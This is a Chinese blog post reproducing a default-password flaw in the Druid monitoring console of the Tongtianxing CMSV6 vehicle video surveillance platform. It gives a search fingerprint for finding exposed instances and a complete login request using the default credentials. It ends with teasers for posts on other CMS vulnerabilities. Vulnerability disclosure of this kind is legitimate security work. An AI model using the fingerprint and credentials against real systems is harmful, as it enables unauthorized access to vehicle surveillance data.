【漏洞复现】通天星CMSV6车载视频监控平台 druid存在默认口令漏洞

于 2024-03-27 15:56:20 发布
阅读量390 收藏 1
点赞数 16
分类专栏: 漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137080258
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 druid存在默认口令漏洞。

二、影响版本

  • 通天星CMSV6车载视频监控平台

三、资产测绘

  • hunterweb.body="./open/webApi.html"
  • 特征

image.png

四、漏洞复现

POST /druid/submitLogin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close
Cookie: JSESSIONID=4F7D8A071EAC19E6196D1775D84D2F8D

loginUsername=ttx&loginPassword=ttx123456.

image-20240327155106521

image-20240327155411478

E_cho234
关注
  • 16
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Druid监控页面配置用户密码、去除Ad
Benjamin
03-08 1万+
Druid监控页面配置用户密码、去除Ad。
【1day漏洞复现天星CMSV6车载视频监控平台默认口令漏洞
qq_34780861的博客
03-27 331
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
天星CMSV6 车载视频监控平台信息泄露漏洞
weixin_52204925的博客
02-24 1514
天星CMSV6 车载视频监控平台信息泄露漏洞
鸿运(天星CMSV6车载)主动安全监控云平台敏感信息泄露漏洞
做自己喜欢的事,并将其发挥到极致!
02-28 884
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞
复现天星CMS 安全监控云平台任意文件读取漏洞_60
fushuang333的博客
02-28 676
复现天星CMS 安全监控云平台任意文件读取漏洞过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的复现过程。
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
苹果CMSv10粉色大气视频站模板.zip
05-27
价值100元的商业苹果CMSv10粉色大气视频站模板,丰富自定义页面如全站单榜、周期更新、帮助页面,支持影视专题、影片评论、留言本、迅雷下载插件、用户中心。这套粉色大气视频站模板的效果基础上新增矢量图图标,更...
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
漏洞复现天星CMSV6车载监控平台FTP匿名访问
晚风不及你
01-05 624
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
spring boot 中阿里druid 数据源配置及密码加密
liwei10822的博客
12-20 4179
spring boot 中阿里druid 数据源配置及密码加密
配置 Druid 数据源及密码加密-SpringBoot 2.7 实战基础
youyacoder的博客
08-05 3514
前文集成 MyBatis Plus,实现了一组增删改查接口。在启动服务时,从控制台中可以看出 Spring Boot 默认使用Hikari作为数据库连接池,Hikari性能很优秀。在国内使用较多的连接池还属阿里开源的Druid,中文发音为德鲁伊。Druid结合了 C3P0、DBCP 等 DB 池的优点,同时还加入了日志监控,可以很好的监控 DB 池连接和 SQL 的执行情况。...
阿里druid数据源配置及数据库密码加密
qq_37634156的博客
10-08 2113
前言 1、阿里默认只对用户密码解密 2、druid 1.0.16版本及以上的解密时需要同时配置publicKey 用户密码加密 CMD运行命令 java -cp druid-1.0.9.jar com.alibaba.druid.filter.config.ConfigTools you_password druid 1.0.16之前 druid 1.0.16及以后 DataSource配置 druid 1.0.16之前 spring: datasource: ..
spring boot配置druid(德鲁伊)
凌大大的博客
06-08 2万+
spring boot配置druid(德鲁伊)关于druid的介绍请看 阿里巴巴温少访谈1.引入相关依赖,全部依赖是上一篇spring boot+mybatis依赖的基础上,再加上下边的依赖,如下: <!-- Druid数据库连接池组件 --> <dependency> <groupId>com.alibaba</groupId> <artifactId>druid</artifa
海洋cms v6.53 v6.54版本漏洞复现
weixin_30243533的博客
10-10 793
海洋cms v6.53 v6.54版本漏洞复现 参考链接: 今天发现freebuf上一篇海洋cms漏洞,来复现一下。 http://www.freebuf.com/vuls/150042.html 漏洞原理: 文章里说的很清楚echoSearchPage函数中的content变量传给了parself函数,跟踪代码,找到./include/main.class.php,可以看到pars...
Spring Boot druid监控页添加登录访问权限(用户名+密码)
热门推荐
猪哥
10-13 4万+
需求 druid作为数据源的一名后起之秀,凭借其出色的性能,渐渐被大家使用。当然还有他的监控页面也有这非常大的作用。但是监控页面往往包含了很多隐私的数据信息,所以需要将其保密,所以可以为监控页面添加一个用户名和密码,确保其安全。 代码 在druidConfig.class中的druidServlet()方法里添加loginUsername和loginPassword参数,这样就可
cmsv6 sql注入漏洞
最新发布
04-26
CMSv6是一个广泛使用的内容管理系统,而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时,攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码,从而获取、修改或删除数据库中的数据。 CMSv6的SQL注入漏洞可能导致以下风险: 1. 数据泄露:攻击者可以过注入恶意的SQL代码来获取数据库中的敏感信息,如用户账号、密码等。 2. 数据篡改:攻击者可以修改数据库中的数据,包括修改用户信息、文章内容等。 3. 数据删除:攻击者可以过注入删除语句删除数据库中的数据,导致数据的不可恢复性损失。 为了防止SQL注入漏洞,开发者应该采取以下措施: 1. 使用参数化查询或预编译语句来处理用户输入,确保输入数据经过正确的转义和过滤。 2. 对于动态生成的SQL查询,避免直接拼接用户输入到查询语句中,而是使用参数化查询。 3. 限制数据库用户的权限,确保数据库用户只能执行必要的操作,并且不允许直接执行危险的SQL语句。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值